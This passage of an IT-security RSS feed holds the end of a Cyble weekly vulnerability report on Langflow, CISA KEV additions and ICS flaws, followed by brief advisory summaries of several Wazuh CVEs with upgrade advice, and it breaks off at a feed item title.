<p><!-- wp:paragraph --></p>
<p>CVE-2026-33309 is a critical vulnerability affecting Langflow, an AI workflow framework, enabling attackers to compromise application logic and underlying infrastructure.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The flaw highlights the emerging attack surface in AI-driven platforms, where exploitation can lead to credential theft and full system compromise. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Vulnerabilities Added to CISA KEV</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>CISA continued expanding its KEV catalog, reflecting active exploitation trends. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Notable additions include: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>CVE-2026-20131</strong> — Cisco FMC RCE vulnerability actively exploited by ransomware groups  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>CVE-2025-32432</strong> — Craft CMS RCE vulnerability enabling full server takeover  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>These additions emphasize the rapid transition from disclosure to exploitation, particularly in enterprise-facing systems. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Critical ICS Vulnerabilities</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>CISA issued 12 ICS advisories covering 150 vulnerabilities, with a strong concentration in industrial automation platforms.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading"><strong>Festo Automation Suite with CODESYS (Multiple Critical CVEs)</strong> </h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>A large cluster of vulnerabilities affects Festo Automation Suite integrated with CODESYS, spanning multiple years and severity levels.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>These include: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Buffer overflows  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Improper access control  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Out-of-bounds writes  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Missing authentication  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>The accumulation of these flaws indicates systemic security weaknesses, enabling attackers to destabilize systems or gain persistent access. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>CVE-2018-10612 — Festo/CODESYS (Critical)</strong> </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This vulnerability involves improper access control, allowing attackers to bypass restrictions and gain unauthorized access to industrial systems.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>CVE-2021-30190 — Festo/CODESYS (Critical)</strong> </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>A missing authentication vulnerability enabling attackers to execute critical functions without credentials, potentially leading to full system compromise.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading"><strong>EV Charging Infrastructure Vulnerabilities (Critical)</strong> </h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Critical vulnerabilities were also identified in EV charging platforms such as IGL-Technologies eParking.fi and CTEK Chargeportal.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>These flaws allow: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Unauthorized administrative access  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Service disruption  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Large-scale denial-of-service attacks  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>The global deployment of EV infrastructure significantly amplifies the risk of coordinated attacks across energy and transportation ecosystems. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Impacted Critical Infrastructure Sectors</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Analysis of ICS vulnerabilities shows a significant concentration in: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Energy infrastructure  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Transportation systems  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Industrial automation  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>The increasing overlap between these sectors—particularly in EV ecosystems—creates interdependent risk, where a compromise in one domain can cascade into others.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Conclusion</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>This week’s findings highlight a convergence of: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Rapid vulnerability disclosure cycles  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Active exploitation confirmed through KEV additions  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Growing attack surface in AI and cloud-native environments  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Deep-rooted security weaknesses in industrial systems  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>With 222 publicly available PoCs, active underground discussions, and widespread ICS exposure, organizations face heightened risk across both IT and OT environments.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Key Recommendations </strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Prioritize vulnerabilities based on exploit availability and severity  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Secure AI frameworks and development pipelines  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Harden Kubernetes and cloud-native environments  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Implement strong authentication and access controls  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Segment IT and OT networks to limit lateral movement  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Address legacy vulnerabilities in ICS environments  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Monitor underground forums and <a class="wpil_keyword_link" href="https://cyble.com/solutions/cyber-threat-intelligence/" target="_blank" rel="noopener" title="Cyber Threat Intelligence Platform | Strengthen Security" data-wpil-keyword-link="linked" data-wpil-monitor-id="30279">threat intelligence</a> sources  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Conduct continuous vulnerability assessments and penetration testing  </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><em>Cyble’s </em><a href="https://cyble.com/solutions/attack-surface-management/" target="_blank" rel="noreferrer noopener"><em>attack surface management</em></a><em> and </em><a href="https://cyble.com/solutions/vulnerability-management/" target="_blank" rel="noreferrer noopener"><em>vulnerability intelligence solutions</em></a><em> backed by its AI native platform, enable organizations to identify exposed assets, prioritize remediation, and detect early indicators of compromise. By integrating threat intelligence with proactive security strategies, organizations can effectively defend against evolving threats across enterprise and critical infrastructure environments.</em> </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong><a href="https://cyble.com/request-demo/?utm_source=blog&amp;utm_medium=cm" target="_blank" rel="noreferrer noopener">Book your demo</a> </strong>to experience Cyble’s AI native platform now! </p>
<p><!-- /wp:paragraph --></p>
<p>The post <a rel="nofollow" href="https://cyble.com/blog/cyble-weekly-vulnerabilities-report-apr-01/">The Week in Vulnerabilities: AI Frameworks, VMware, and Critical ICS Exposure</a> appeared first on <a rel="nofollow" href="https://cyble.com/">Cyble</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Proaktive Schwachstellenverwaltung mit Wazuh: Ein neuer Ansatz]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Die Verwaltung von Schwachstellen entwickelt sich weiter, um den Anforderungen moderner IT-Umgebungen gerecht zu werden. Wazuh bietet eine proaktive Lösung, die über traditionelle Methoden hinausgeht und Echtzeit-Überwachung sowie Bedrohungsintelligenz integriert. In der he...]]></description>
<link>https://tsecurity.de/de/3397049/it-security-nachrichten/proaktive-schwachstellenverwaltung-mit-wazuh-ein-neuer-ansatz/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3397049/it-security-nachrichten/proaktive-schwachstellenverwaltung-mit-wazuh-ein-neuer-ansatz/</guid>
<pubDate>Tue, 31 Mar 2026 19:35:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-proactive-vulnerability-management.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-proactive-vulnerability-management.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-proactive-vulnerability-management-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-proactive-vulnerability-management-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-proactive-vulnerability-management-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-proactive-vulnerability-management-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-proactive-vulnerability-management-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Die Verwaltung von Schwachstellen entwickelt sich weiter, um den Anforderungen moderner IT-Umgebungen gerecht zu werden. Wazuh bietet eine proaktive Lösung, die über traditionelle Methoden hinausgeht und Echtzeit-Überwachung sowie Bedrohungsintelligenz integriert. In der heutigen digitalen Landschaft ist die Verwaltung von Schwachstellen ein kontinuierlicher Prozess, der weit über das bloße Scannen hinausgeht. Es […]</p>
<div><a href="https://www.it-boltwise.de/proaktive-schwachstellenverwaltung-mit-wazuh-ein-neuer-ansatz.html">... den vollständigen Artikel <strong>»Proaktive Schwachstellenverwaltung mit Wazuh: Ein neuer Ansatz«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/proaktive-schwachstellenverwaltung-mit-wazuh-ein-neuer-ansatz.html">Proaktive Schwachstellenverwaltung mit Wazuh: Ein neuer Ansatz</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32984 | Wazuh 3.5.0/4.3.10 authd out-of-bounds (WID-SEC-2026-0908)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in Wazuh 3.5.0/4.3.10. This impacts an unknown function of the component authd. The manipulation leads to out-of-bounds read.

This vulnerability is referenced as CVE-2026-32984. Remote exploitation of the attack is possible. No exploit is a...]]></description>
<link>https://tsecurity.de/de/3393944/sicherheitsluecken/cve-2026-32984-wazuh-3504310-authd-out-of-bounds-wid-sec-2026-0908/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3393944/sicherheitsluecken/cve-2026-32984-wazuh-3504310-authd-out-of-bounds-wid-sec-2026-0908/</guid>
<pubDate>Mon, 30 Mar 2026 19:21:35 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/wazuh">Wazuh 3.5.0/4.3.10</a>. This impacts an unknown function of the component <em>authd</em>. The manipulation leads to out-of-bounds read.

This vulnerability is referenced as <a href="https://vuldb.com/source_cve/353946">CVE-2026-32984</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-7340 | Wazuh 3.5.0/4.3.10 authd out-of-bounds (EUVD-2023-60542 / WID-SEC-2026-0908)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in Wazuh 3.5.0/4.3.10. Affected is an unknown function of the component authd. The manipulation leads to out-of-bounds read.

This vulnerability is uniquely identified as CVE-2023-7340. The attack is possible to be carried out remotely. ...]]></description>
<link>https://tsecurity.de/de/3393943/sicherheitsluecken/cve-2023-7340-wazuh-3504310-authd-out-of-bounds-euvd-2023-60542-wid-sec-2026-0908/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3393943/sicherheitsluecken/cve-2023-7340-wazuh-3504310-authd-out-of-bounds-euvd-2023-60542-wid-sec-2026-0908/</guid>
<pubDate>Mon, 30 Mar 2026 19:21:34 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/wazuh">Wazuh 3.5.0/4.3.10</a>. Affected is an unknown function of the component <em>authd</em>. The manipulation leads to out-of-bounds read.

This vulnerability is uniquely identified as <a href="https://vuldb.com/source_cve/353958">CVE-2023-7340</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-15615 | Wazuh up to 4.7.3/4.7.x authd default permission (GHSA-rr83-v9v7-jjhp / WID-SEC-2026-0908)]]></title>
<description><![CDATA[A vulnerability was found in Wazuh up to 4.7.3/4.7.x. It has been classified as critical. This issue affects some unknown processing of the component authd. This manipulation causes incorrect default permissions.

This vulnerability is registered as CVE-2025-15615. Remote exploitation of the atta...]]></description>
<link>https://tsecurity.de/de/3393942/sicherheitsluecken/cve-2025-15615-wazuh-up-to-47347x-authd-default-permission-ghsa-rr83-v9v7-jjhp-wid-sec-2026-0908/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3393942/sicherheitsluecken/cve-2025-15615-wazuh-up-to-47347x-authd-default-permission-ghsa-rr83-v9v7-jjhp-wid-sec-2026-0908/</guid>
<pubDate>Mon, 30 Mar 2026 19:21:33 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/wazuh">Wazuh up to 4.7.3/4.7.x</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. This issue affects some unknown processing of the component <em>authd</em>. This manipulation causes incorrect default permissions.

This vulnerability is registered as <a href="https://vuldb.com/source_cve/353996">CVE-2025-15615</a>. Remote exploitation of the attack is possible. No exploit is available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32983 | Wazuh up to 4.7.3/4.7.x authd default permission (EUVD-2026-16686 / WID-SEC-2026-0908)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Wazuh up to 4.7.3/4.7.x. This affects an unknown part of the component authd. Performing a manipulation results in incorrect default permissions.

This vulnerability is cataloged as CVE-2026-32983. It is possible to initiate the...]]></description>
<link>https://tsecurity.de/de/3393941/sicherheitsluecken/cve-2026-32983-wazuh-up-to-47347x-authd-default-permission-euvd-2026-16686-wid-sec-2026-0908/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3393941/sicherheitsluecken/cve-2026-32983-wazuh-up-to-47347x-authd-default-permission-euvd-2026-16686-wid-sec-2026-0908/</guid>
<pubDate>Mon, 30 Mar 2026 19:21:31 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/wazuh">Wazuh up to 4.7.3/4.7.x</a>. This affects an unknown part of the component <em>authd</em>. Performing a manipulation results in incorrect default permissions.

This vulnerability is cataloged as <a href="https://vuldb.com/source_cve/353950">CVE-2026-32983</a>. It is possible to initiate the attack remotely. There is no exploit available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-15616 | Wazuh up to 4.7.x code injection (GHSA-522v-p59v-58gm / WID-SEC-2026-0908)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in Wazuh up to 4.7.x. This impacts an unknown function. The manipulation results in code injection.

This vulnerability is known as CVE-2025-15616. It is possible to launch the attack remotely. No exploit is available.

The affected component sho...]]></description>
<link>https://tsecurity.de/de/3393940/sicherheitsluecken/cve-2025-15616-wazuh-up-to-47x-code-injection-ghsa-522v-p59v-58gm-wid-sec-2026-0908/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3393940/sicherheitsluecken/cve-2025-15616-wazuh-up-to-47x-code-injection-ghsa-522v-p59v-58gm-wid-sec-2026-0908/</guid>
<pubDate>Mon, 30 Mar 2026 19:21:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/wazuh">Wazuh up to 4.7.x</a>. This impacts an unknown function. The manipulation results in code injection.

This vulnerability is known as <a href="https://vuldb.com/source_cve/354001">CVE-2025-15616</a>. It is possible to launch the attack remotely. No exploit is available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-15617 | Wazuh 4.12.0 GitHub Action GITHUB_TOKEN insufficiently protected credentials (GHSA-6xqr-4q5g-xc7x / WID-SEC-2026-0908)]]></title>
<description><![CDATA[A vulnerability has been found in Wazuh 4.12.0 and classified as problematic. Impacted is an unknown function of the component GitHub Action Handler. This manipulation of the argument GITHUB_TOKEN causes insufficiently protected credentials.

This vulnerability is tracked as CVE-2025-15617. The a...]]></description>
<link>https://tsecurity.de/de/3393939/sicherheitsluecken/cve-2025-15617-wazuh-4120-github-action-githubtoken-insufficiently-protected-credentials-ghsa-6xqr-4q5g-xc7x-wid-sec-2026-0908/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3393939/sicherheitsluecken/cve-2025-15617-wazuh-4120-github-action-githubtoken-insufficiently-protected-credentials-ghsa-6xqr-4q5g-xc7x-wid-sec-2026-0908/</guid>
<pubDate>Mon, 30 Mar 2026 19:21:28 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/wazuh">Wazuh 4.12.0</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Impacted is an unknown function of the component <em>GitHub Action Handler</em>. This manipulation of the argument <em>GITHUB_TOKEN</em> causes insufficiently protected credentials.

This vulnerability is tracked as <a href="https://vuldb.com/source_cve/354008">CVE-2025-15617</a>. The attack is possible to be carried out remotely. No exploit exists.

It is recommended to apply a patch to fix this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [mittel] Wazuh: Mehrere Schwachstellen]]></title>
<description><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Wazuh ausnutzen, um einen Denial of Service Angriff durchzuführen, beliebigen Code auszuführen, Daten zu manipulieren und vertrauliche Informationen offenzulegen.]]></description>
<link>https://tsecurity.de/de/3392838/it-security-nachrichten/neu-mittel-wazuh-mehrere-schwachstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3392838/it-security-nachrichten/neu-mittel-wazuh-mehrere-schwachstellen/</guid>
<pubDate>Mon, 30 Mar 2026 13:36:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Wazuh ausnutzen, um einen Denial of Service Angriff durchzuführen, beliebigen Code auszuführen, Daten zu manipulieren und vertrauliche Informationen offenzulegen.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-15612 | Wazuh up to 4.1.3/4.13.x TLS Certificate Validation certificate validation (GHSA-wvg9-7q49-c7mg / EUVD-2025-209107)]]></title>
<description><![CDATA[A vulnerability was found in Wazuh up to 4.1.3/4.13.x. It has been declared as critical. Impacted is an unknown function of the component TLS Certificate Validation Handler. Such manipulation leads to improper certificate validation.

This vulnerability is documented as CVE-2025-15612. The attack...]]></description>
<link>https://tsecurity.de/de/3390186/sicherheitsluecken/cve-2025-15612-wazuh-up-to-413413x-tls-certificate-validation-certificate-validation-ghsa-wvg9-7q49-c7mg-euvd-2025-209107/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3390186/sicherheitsluecken/cve-2025-15612-wazuh-up-to-413413x-tls-certificate-validation-certificate-validation-ghsa-wvg9-7q49-c7mg-euvd-2025-209107/</guid>
<pubDate>Sun, 29 Mar 2026 05:39:18 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/wazuh">Wazuh up to 4.1.3/4.13.x</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. Impacted is an unknown function of the component <em>TLS Certificate Validation Handler</em>. Such manipulation leads to improper certificate validation.

This vulnerability is documented as <a href="https://vuldb.com/source_cve/353997">CVE-2025-15612</a>. The attack can be executed remotely. There is not any exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32983 | Wazuh up to 4.7.3/4.7.x authd default permission (EUVD-2026-16686)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Wazuh up to 4.7.3/4.7.x. This affects an unknown part of the component authd. Performing a manipulation results in incorrect default permissions.

This vulnerability is cataloged as CVE-2026-32983. It is possible to initiate the...]]></description>
<link>https://tsecurity.de/de/3387360/sicherheitsluecken/cve-2026-32983-wazuh-up-to-47347x-authd-default-permission-euvd-2026-16686/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3387360/sicherheitsluecken/cve-2026-32983-wazuh-up-to-47347x-authd-default-permission-euvd-2026-16686/</guid>
<pubDate>Fri, 27 Mar 2026 18:53:19 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">critical</a>, has been found in <a href="https://vuldb.com/?product.wazuh">Wazuh up to 4.7.3/4.7.x</a>. This affects an unknown part of the component <em>authd</em>. Performing a manipulation results in incorrect default permissions.

This vulnerability is cataloged as <a href="https://vuldb.com/?source_cve.353950">CVE-2026-32983</a>. It is possible to initiate the attack remotely. There is no exploit available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-7340 | Wazuh 3.5.0/4.3.10 authd out-of-bounds (EUVD-2023-60542)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in Wazuh 3.5.0/4.3.10. Affected is an unknown function of the component authd. The manipulation leads to out-of-bounds read.

This vulnerability is uniquely identified as CVE-2023-7340. The attack is possible to be carried out remotely. ...]]></description>
<link>https://tsecurity.de/de/3387358/sicherheitsluecken/cve-2023-7340-wazuh-3504310-authd-out-of-bounds-euvd-2023-60542/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3387358/sicherheitsluecken/cve-2023-7340-wazuh-3504310-authd-out-of-bounds-euvd-2023-60542/</guid>
<pubDate>Fri, 27 Mar 2026 18:53:16 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/?kb.risk">problematic</a> has been detected in <a href="https://vuldb.com/?product.wazuh">Wazuh 3.5.0/4.3.10</a>. Affected is an unknown function of the component <em>authd</em>. The manipulation leads to out-of-bounds read.

This vulnerability is uniquely identified as <a href="https://vuldb.com/?source_cve.353958">CVE-2023-7340</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-25771 | Wazuh up to 4.14.2 API middlewares.py generate_keypair resource consumption (GHSA-33w3-p5hm-jw7g / WID-SEC-2026-0771)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in Wazuh up to 4.14.2. The impacted element is the function generate_keypair of the file middlewares.py of the component API. The manipulation results in resource consumption.

This vulnerability is reported as CVE-2026-25771. The at...]]></description>
<link>https://tsecurity.de/de/3360202/sicherheitsluecken/cve-2026-25771-wazuh-up-to-4142-api-middlewarespy-generatekeypair-resource-consumption-ghsa-33w3-p5hm-jw7g-wid-sec-2026-0771/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3360202/sicherheitsluecken/cve-2026-25771-wazuh-up-to-4142-api-middlewarespy-generatekeypair-resource-consumption-ghsa-33w3-p5hm-jw7g-wid-sec-2026-0771/</guid>
<pubDate>Wed, 18 Mar 2026 19:34:51 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">problematic</a>, was found in <a href="https://vuldb.com/?product.wazuh">Wazuh up to 4.14.2</a>. The impacted element is the function <code>generate_keypair</code> of the file <em>middlewares.py</em> of the component <em>API</em>. The manipulation results in resource consumption.

This vulnerability is reported as <a href="https://vuldb.com/?source_cve.351403">CVE-2026-25771</a>. The attack can be launched remotely. No exploit exists.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-25772 | Wazuh up to 4.14.2 Database Synchronization wdb_delta_event.c stack-based overflow (GHSA-h7vp-j34v-h6j5 / WID-SEC-2026-0771)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in Wazuh up to 4.14.2. This affects an unknown part of the file wdb_delta_event.c of the component Database Synchronization Module. The manipulation results in stack-based buffer overflow.

This vulnerability was named CVE-2026-25772. Th...]]></description>
<link>https://tsecurity.de/de/3360201/sicherheitsluecken/cve-2026-25772-wazuh-up-to-4142-database-synchronization-wdbdeltaeventc-stack-based-overflow-ghsa-h7vp-j34v-h6j5-wid-sec-2026-0771/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3360201/sicherheitsluecken/cve-2026-25772-wazuh-up-to-4142-database-synchronization-wdbdeltaeventc-stack-based-overflow-ghsa-h7vp-j34v-h6j5-wid-sec-2026-0771/</guid>
<pubDate>Wed, 18 Mar 2026 19:34:49 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/?kb.risk">critical</a> has been discovered in <a href="https://vuldb.com/?product.wazuh">Wazuh up to 4.14.2</a>. This affects an unknown part of the file <em>wdb_delta_event.c</em> of the component <em>Database Synchronization Module</em>. The manipulation results in stack-based buffer overflow.

This vulnerability was named <a href="https://vuldb.com/?source_cve.351409">CVE-2026-25772</a>. The attack may be performed from remote. There is no available exploit.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-25790 | Wazuh up to 4.14.2 JSON security_configuration_assessment.c stack-based overflow (GHSA-cf24-hq8x-5jx2 / WID-SEC-2026-0771)]]></title>
